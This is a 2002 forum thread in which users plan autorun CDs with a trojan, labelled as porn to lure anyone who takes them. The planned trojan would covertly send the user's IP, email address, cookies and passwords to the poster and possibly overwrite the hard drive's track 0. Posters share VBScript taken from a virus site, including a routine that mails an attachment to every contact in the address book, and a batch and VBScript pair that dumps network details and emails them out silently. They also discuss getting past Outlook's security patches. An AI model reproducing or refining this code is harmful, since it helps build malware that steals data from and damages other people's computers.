I got a new MP3 player for my Civic and was thinking how cool it is that I can fit all of my music on 4 or 5 CD's instead of having 4 dozen "normal" CD's. Then I got a hairbrained idea about making all of my CD's "autorun" CD's. When inserted into a CD ROM drive, it automatically loads a program -- usually a Setup/Install type of program. But what if I put a virus into all my autorun MP3 CD's that I carry in my car? Is there a virus/trojan that will automatically fire off the users IP, eMail address, and all that other info back to my eMail addy without the user knowing? Anybody good at coding? I figure I could label a few CD's as "XXX P0rn" or something so they'd be sure to load it onto their computer


[Modified by CheezeFrog, 11:25 AM 8/5/2002]

 

that's a pretty clever idea

 

http://vx.netlux.org/dat/vct.shtml


A modified version of this should work to get the email off:

Function doMail()

On Error Resume Next
Set OutlookApp = CreateObject("Ou.tlook.Application")
If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI")
Set AddressLists = MXPINameSpace.Ad.dressLists
For Each address In AddressLists
If address.AddressEntries.Count <> 0 Then
entryCount = address.Addr.essEntries.Count
For i = 1 To entryCount
Set newItem = OutlookApp.CreateItem(0)
Set currentAddress = address.Ad.dressEntries(i)
newItem.To = currentAddress.Add.ress
newItem.Subject = "Here you have, ;o)"
newItem.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachments = newItem.Attachments
attachments.Add FileSystemObject.GetSpeci.alFolder(0) & "\abc"
newItem.DeleteAfterSubmit = True
If newItem.To <> "" Then
newItem.Send
WScriptShell.regwrite "HKCU\software\OnTheFly\m.ailed", "1"
End If
Next
End If
Next
end if

End Function

[Modified by jond, 2:37 PM 8/5/2002]


[Modified by jond, 7:49 PM 8/5/2002]

 

Oh yeah I forgot to add that this (theoretically) would work on any burned CD, not just those written for MP3 players. Oh yeah and it'd be cool for the trojan program to send all of the users cookie files as well so you'd know what msg boards they're on and have their passwords.

 

jond,

Sweet thanks man. I'm not sure what I'm supposed to do with that... compile it? The trojan would probably have to be in the form of a .com or .exe for it to kick off from an Autorun event.

 

Very interesting idea to battle fire with fire.

 

definitely a good idea Cheeze...

 

jond,

I don't know nothin about nothin when it comes to scripting, but from that code you posted, it looks like it grabs all of the eMail addy's in the users address book. I was thinking more along the lines of just grabbing the users eMail addy.

And maybe doing a few absolute writes to the users track 0 info on their HD. Maybe fill it with text that says "f**k you thief!"

 

wow, that's an awesome idea

 

pretty cool idea there

 

Yeah, it does. I was busy as crap today, and didn't look into it but of a sec.
Without testing, something like this maybe?
You would also need something to get the IP, and set it as a variable.
If you get this working, let me know, and I can probably help you with that.


Function doMail()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI")

newItem.To = youremail\@yourdomain.com
newItem.Subject = "I got your CDs"
newItem.Body = "Hi:" My IP Address is: ""

newItem.DeleteAfterSubmit = True
If newItem.To <> "" Then
newItem.Send
End Function

 

Hmm, can't you just run Winipcfg.exe and output to a text file? Or if NT-based, run ipconfig.exe and output to a text file as well? Then just send that text file in the eMail you send to yourself Kills 2 birds with 1 stone -- you'd get his eMail addy and IP in one shot.

 

That's some good stuf Jon.
I as just thinking a few hours ago how I need to find a new hobby after I finish building my ITR and CRXs.

 

That won't be any good if he's NATted behind a firewall ... run a tracert to a txt file and you'll see who's upstream, ie. where the NAT's coming out of.

This is a very slick idea ... wish I had the time to code it!

 

Heres what I have so far. I dont have outlook here, so I cant fully test, but I think it might work.

###Note, I'm not a programmer, and take no responsibility if this blows up your computer, or gets you jail time.###

Theres 2 files. The first is a batch file which would be the one that gets executed. It calls the vbs script when ready.

busted.bat
----------------------------------------
@ECHO OFF
ipconfig /all > c:\busted.txt
start busted.vbs
EXIT
-------------------------------------------


busted.vbs
-------------------------------------------
'The catches CD theives
On Error Resume Next
set objScript = Server.CreateObject("Wscript.Shell")
if WScriptShell.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
doMail()
end if
do
Loop
Function doMail()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI")
newItem.To = youremail\yourdomain.com
newItem.Subject = "I got your CDs"
newItem.Body = "Hi: My IP Address is: "
set attachments = newItem.Attachments
attachments.Add FileSystemObject.GetSpecialFolder(0) & "c:\busted.txt"
newItem.DeleteAfterSubmit = True
newItem.Send
WScriptShell.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
End Function
-------------------------------------------------------





[Modified by jond, 7:21 PM 8/5/2002]

 

like I always say "you can do anything with CODE"

 

anything, as long as the code is running in the right place. lets hope the bad guy is using a PC and not a Mac. using Outlook instead by Eudora/Pegasus also helps.

 

 

Just curious... What will the perp see on screen while this script runs? Does he see Outlook open and all that, or does it run in the background?

 

Wishes he had a friggin' clue as to what all the techobabble means.

 

Means when someone steals your stuff, you have a kinda of e-lojack system which doesnt retrieve your car, but instead send you all their info from their computer so that you can hunt/track them down and get your self some justice.

 

Bingo. I'm going to work on this today.

 

Might try this as a .bat file, but if they are behind a firewall then you are SOL

@echo.
@ipconfig | find "IP Address"
@echo.
@pause

this is a useful .bat to make if you have XP, put it in the windows folder and just type ip at the run prompt to see the machine's ip.


[Modified by brinks, 10:28 AM 8/6/2002]

 

I hate to burst some bubbles, but microsoft is one step ahead of us. VBS cannot be used to start outlook. Outlook will not allow it. It would be rare to find a person not patched.

See here for more info: http://www.slipstick.com/outlook/esecup.htm

You could, however, use a small command-line mailer, such as BLAT. It would be irrelevant as to which OS or email client you are using. very small too.

 

Yeah that's what I was afraid of. I'm in over my head right now because I can barely write a DOS batch file -- anything much beyond "prompt $p$g" and I'm lost Can anybody take this ball and run with it? I know we got some pretty sharp people in this forum (well, compared to me anyway).